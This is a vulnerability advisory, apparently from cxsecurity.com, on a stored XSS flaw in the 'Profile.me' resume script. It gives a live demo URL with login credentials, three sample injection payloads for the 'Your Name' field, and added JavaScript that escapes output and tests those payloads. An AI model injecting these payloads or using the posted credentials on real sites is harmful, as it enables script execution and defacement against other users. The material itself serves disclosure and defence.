Profile.me - Multiuser profile & resume script Stored XSS Injection

2019.05.05
QUIXSS (RU)
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

[*] :: Title: Profile.me - Multiuser profile & resume script Stored XSS Injection
[*] :: Author: QUIXSS
[*] :: Date: 2019-05-05
[*] :: Software: Profile.me - Multiuser profile & resume script

[?] :: Technical Details & Description:
# Weak security measures, such as poor filtering of input field data, have been discovered in the «Profile.me - Multiuser profile & resume script» web application.

[?] :: Demo Website:
# https://codecanyon.net/item/profileme-multiuser-profile-resume-script/23743952
# Frontend: http://profileme.pokkho.com
# Backend: http://profileme.pokkho.com/login
# Login/Password (user): quixss/asdasd

[!] :: Special Note:
# After a few injections you'll see that some blocks on the «Users» page are broken due to bad input field data filtering.
# There are various mechanisms to secure an application. These mechanisms are: ... & Cross-Site Scripting (XSS) Prevention © author

[!] :: For developers:
# Disabling any data changes on a demo website doesn't make your application more secure. It's good for business and sales, but you are simply double-crossing your clients.

[+] :: PoC [Links]:
# http://profileme.pokkho.com/login (log in as quixss/asdasd)
# http://profileme.pokkho.com/admin/users (marquee)

[+] :: PoC [Stored XSS Injection]:
# Go to the demo website http://profileme.pokkho.com and register a new account (no validation required). Use the «Your Name» field for payload injection. There are probably other vulnerable fields, but they are all disabled on the demo website.
# Sample payload #1: " autofocus onfocus="alert('QUIXSS');"/>
# Sample payload #2: " autofocus onfocus="alert('QUIXSS');window.open('https://twitter.com/quixss');"/><img src="https://i.imgur.com/zRm8R9z.gif">
# Sample payload #3: "></h3></tr></td></table></tr></td></table></div><marquee>QUIXSS
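The root cause above is raw interpolation of the «Your Name» value into HTML. The following is an added example (not code from the advisory or from the Profile.me product) showing context-aware output encoding that neutralises the three sample payloads; the edit-form input and the «Users» card templates are hypothetical stand-ins for the application's own markup.

```javascript
// Added example: output encoding for the two contexts the advisory touches,
// a double-quoted value="..." attribute and the text content of an <h3>.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };

// Escape the five characters that can change HTML context; suitable for text
// nodes and for double-quoted attribute values (not for URLs or inline JS).
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, ch => HTML_ESCAPES[ch]);
}

// Hypothetical edit-form template: the stored name sits inside a quoted attribute.
function renderNameInput(name) {
  return `<input type="text" name="name" value="${escapeHtml(name)}">`;
}
// Same template with the defect the advisory describes (no encoding), for contrast.
function renderNameInputUnsafe(name) {
  return `<input type="text" name="name" value="${name}">`;
}

// Hypothetical «Users» card: the stored name is element text content.
function renderUserCard(name) {
  return `<div class="user"><h3>${escapeHtml(name)}</h3></div>`;
}
function renderUserCardUnsafe(name) {
  return `<div class="user"><h3>${name}</h3></div>`;
}

// Check 1: an intact attribute boundary leaves exactly the template's own
// quote characters in the output (encoded quotes no longer count).
function quoteCount(html) {
  return (html.match(/"/g) || []).length;
}

// Check 2: list tag names in the fragment that the template did not emit itself
// (payload #3 closes the card and opens a <marquee>; payload #2 adds an <img>).
function strayTags(html, allowed) {
  const names = [...html.matchAll(/<\/?([a-zA-Z][a-zA-Z0-9]*)/g)].map(m => m[1].toLowerCase());
  return names.filter(t => !allowed.includes(t));
}

// Constructed copies of the advisory's sample payloads, used as test input.
const PAYLOADS = [
  `" autofocus onfocus="alert('QUIXSS');"/>`,
  `" autofocus onfocus="alert('QUIXSS');window.open('https://twitter.com/quixss');"/><img src="https://i.imgur.com/zRm8R9z.gif">`,
  `"></h3></tr></td></table></tr></td></table></div><marquee>QUIXSS`,
];

// Summarise both checks for every payload in both contexts.
function audit(payload) {
  return {
    unsafeInputQuotes: quoteCount(renderNameInputUnsafe(payload)),
    safeInputQuotes: quoteCount(renderNameInput(payload)),
    unsafeCardStray: strayTags(renderUserCardUnsafe(payload), ['div', 'h3']),
    safeCardStray: strayTags(renderUserCard(payload), ['div', 'h3']),
  };
}
```

The safe template keeps exactly six quote characters and zero stray tags for every payload; the unsafe one gains the payload's quotes and, for payloads #2 and #3, an `img` or `marquee` element.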

References:

https://codecanyon.net/item/profileme-multiuser-profile-resume-script/23743952
https://twitter.com/quixss


Copyright 2019, cxsecurity.com